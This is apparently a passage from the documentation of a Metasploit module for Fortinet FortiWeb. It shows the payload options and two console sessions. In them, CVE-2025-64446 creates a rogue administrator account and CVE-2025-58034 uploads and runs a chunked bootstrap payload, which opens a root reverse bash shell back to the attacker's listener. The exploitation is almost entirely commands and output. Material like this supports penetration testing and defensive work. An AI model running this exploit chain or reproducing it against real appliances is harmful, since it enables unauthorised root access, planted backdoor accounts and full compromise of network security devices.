   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf exploit(linux/http/fortinet_fortiweb_rce) > check
[*] 192.168.86.202:443 - The target appears to be vulnerable.
msf exploit(linux/http/fortinet_fortiweb_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Creating a new admin account via CVE-2025-64446...
[+] New admin account successfully created: isela_fritsch:LpWXiFof
[*] Logging in...
[+] Successfully logged in as isela_fritsch
[*] Executing payload via CVE-2025-58034...
[*] Uploading bootstrap payload chunk 1 of 4...
[*] Uploading bootstrap payload chunk 2 of 4...
[*] Uploading bootstrap payload chunk 3 of 4...
[*] Uploading bootstrap payload chunk 4 of 4...
[*] Amalgamating bootstrap payload chunks...
[*] Executing bootstrap payload...
[+] Finished.
[*] Command shell session 1 opened (192.168.86.122:4444 -> 192.168.86.202:19470) at 2025-11-21 11:33:33 +0000

id
uid=0(root) gid=0(root)
uname -a
Linux FortiWeb 6.1.62 #1 SMP Fri Aug 22 21:26:25 UTC 2025 x86_64 GNU/Linux
cat /VERSION
8.0.1-B0047
exit
[*] 192.168.86.202 - Command shell session 1 closed.
```

### Example 2 (CVE-2025-58034)

In this example, the attacker has existing admin credentials, so only `CVE-2025-58034` is used
to execute a payload.

```
msf exploit(linux/http/fortinet_fortiweb_rce) > set FortiWebAdminUsername hax0r
FortiWebAdminUsername => hax0r
msf exploit(linux/http/fortinet_fortiweb_rce) > set FortiWebAdminPassword hax0r
FortiWebAdminPassword => hax0r
msf exploit(linux/http/fortinet_fortiweb_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Using existing admin credentials: hax0r:hax0r
[*] Logging in...
[+] Successfully logged in as hax0r
[*] Executing payload via CVE-2025-58034...
[*] Uploading bootstrap payload chunk 1 of 4...
[*] Uploading bootstrap payload chunk 2 of 4...
[*] Uploading bootstrap payload chunk 3 of 4...
[*] Uploading bootstrap payload chunk 4 of 4...
[*] Amalgamating bootstrap payload chunks...
[*] Executing bootstrap payload...
[+] Finished.
[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.202:3684) at 2025-11-21 11:34:57 +0000

id
uid=0(root) gid=0(root)
uname -a
Linux FortiWeb 6.1.62 #1 SMP Fri Aug 22 21:26:25 UTC 2025 x86_64 GNU/Linux
cat /VERSION
8.0.1-B0047
exit
[*] 192.168.86.202 - Command shell session 2 closed.
```